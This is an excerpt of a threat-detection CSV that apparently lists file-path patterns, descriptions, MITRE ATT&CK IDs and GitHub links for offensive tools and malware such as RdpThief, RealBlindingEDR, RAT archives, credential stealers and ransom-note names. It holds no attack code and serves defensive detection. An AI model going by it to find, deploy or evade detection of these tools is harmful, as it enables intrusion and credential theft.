"*\Ransomware.dll*",".{0,1000}\\Ransomware\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17740"
"*\Ransomware.exe",".{0,1000}\\Ransomware\.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","17741"
"*\Ransomware.pdb*",".{0,1000}\\Ransomware\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17742"
"*\rarce.py*",".{0,1000}\\rarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","17743"
"*\rarreg.key*",".{0,1000}\\rarreg\.key.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","17744"
"*\RasMan.cpp*",".{0,1000}RasMan\.cpp.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","17745"
"*\rasman.exe*",".{0,1000}\\rasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","17746"
"*\RasMan.sln*",".{0,1000}RasMan\.sln.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","17747"
"*\RasmanPotato*",".{0,1000}\\RasmanPotato.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","17748"
"*\RATC.exe*",".{0,1000}\\RATC\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17749"
"*\ratchatPT.go*",".{0,1000}\\ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","17750"
"*\ratchatPT.syso*",".{0,1000}\\ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","17751"
"*\ratnow.exe*",".{0,1000}\\ratnow\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17759"
"*\rats\badrat_cs\*",".{0,1000}\\rats\\badrat_cs\\.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","17760"
"*\rats\js_downloader.vba*",".{0,1000}\\rats\\js_downloader\.vba.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","17761"
"*\rattler.cpp*",".{0,1000}\\rattler\.cpp.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17762"
"*\Rattler.exe*",".{0,1000}\\Rattler\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17763"
"*\Rattler_32.exe*",".{0,1000}\\Rattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17764"
"*\Rattler_x64.exe*",".{0,1000}\\Rattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17765"
"*\rattler-master*",".{0,1000}\\rattler\-master.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","17766"
"*\Rat-x64.exe*",".{0,1000}\\Rat\-x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17767"
"*\Rat-x64.lnk*",".{0,1000}\\Rat\-x64\.lnk.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17768"
"*\rawrpc_embedded.py*",".{0,1000}\\rawrpc_embedded\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","17769"
"*\RAZAR ASRAT.exe*",".{0,1000}\\RAZAR\sASRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17770"
"*\Razar SRAT.exe*",".{0,1000}\\Razar\sSRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17771"
"*\rbcd.py*",".{0,1000}\\rbcd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17772"
"*\rcat-v*-win-x86_64.exe*",".{0,1000}\\rcat\-v.{0,1000}\-win\-x86_64\.exe.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","17773"
"*\rdcman.py*",".{0,1000}\\rdcman\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17779"
"*\rdcmanfox.dll*",".{0,1000}\\rdcmanfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","17780"
"*\RDP Recognizer.exe*",".{0,1000}\\RDP\sRecognizer\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","17781"
"*\RDP Recognizer.pdb*",".{0,1000}\\RDP\sRecognizer\.pdb.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","17782"
"*\RDP Recognizer1.exe*",".{0,1000}\\RDP\sRecognizer1\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","17783"
"*\RDP Recognizer3.exe*",".{0,1000}\\RDP\sRecognizer3\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","17784"
"*\rdp.py*",".{0,1000}\\rdp\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17786"
"*\rdp_check.py*",".{0,1000}\\rdp_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17787"
"*\RDPCreds.txt*",".{0,1000}\\RDPCreds\.txt.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","17789"
"*\RDPCredsStealerDLL*",".{0,1000}\\RDPCredsStealerDLL.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","17790"
"*\RDPHook.dll*",".{0,1000}\\RDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","17791"
"*\RDPKeylog.exe*",".{0,1000}\\RDPKeylog\.exe.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","17792"
"*\RDPMITM.py*",".{0,1000}\\RDPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","17793"
"*\RdpStrike.asm*",".{0,1000}\\RdpStrike\.asm.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","17794"
"*\RdpStrike.cna*",".{0,1000}\\RdpStrike\.cna.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","17795"
"*\RdpStrike\*",".{0,1000}\\RdpStrike\\.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","17796"
"*\RdpThief.*",".{0,1000}\\RdpThief\..{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","17797"
"*\RdpThief.cna*",".{0,1000}\\RdpThief\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17798"
"*\RdpThief.dll*",".{0,1000}\\RdpThief\.dll.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","17799"
"*\RdpThief_x64.*",".{0,1000}\\RdpThief_x64\..{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","17800"
"*\RdpThief_x64.tmp*",".{0,1000}\\RdpThief_x64\.tmp.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17801"
"*\rdpv.exe*",".{0,1000}\\rdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","17802"
"*\README.BlackSuit.txt*",".{0,1000}\\README\.BlackSuit\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17813"
"*\README_FOR_DECRYPT.txtt*",".{0,1000}\\README_FOR_DECRYPT\.txtt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17814"
"*\readme_for_unlock.txt*",".{0,1000}\\readme_for_unlock\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17815"
"*\readme_for_unlock_2.txt*",".{0,1000}\\readme_for_unlock_2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17816"
"*\readme_for_unlock_3.txt*",".{0,1000}\\readme_for_unlock_3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17817"
"*\README_TO_DECRYPT.txt*",".{0,1000}\\README_TO_DECRYPT\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17818"
"*\READ-ME-NOW.txt*",".{0,1000}\\READ\-ME\-NOW\.txt.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","17819"
"*\ReadPEInMemory.exe*",".{0,1000}\\ReadPEInMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","17820"
"*\RealBlindingEDR.vcxproj*",".{0,1000}\\RealBlindingEDR\.vcxproj.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","17821"
"*\RealBlindingEDR\*",".{0,1000}\\RealBlindingEDR\\.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","17822"
"*\Realistic Format Virus.exe*",".{0,1000}\\Realistic\sFormat\sVirus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17823"
"*\Reaper\Reaper.cpp*",".{0,1000}\\Reaper\\Reaper\.cpp.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","17825"
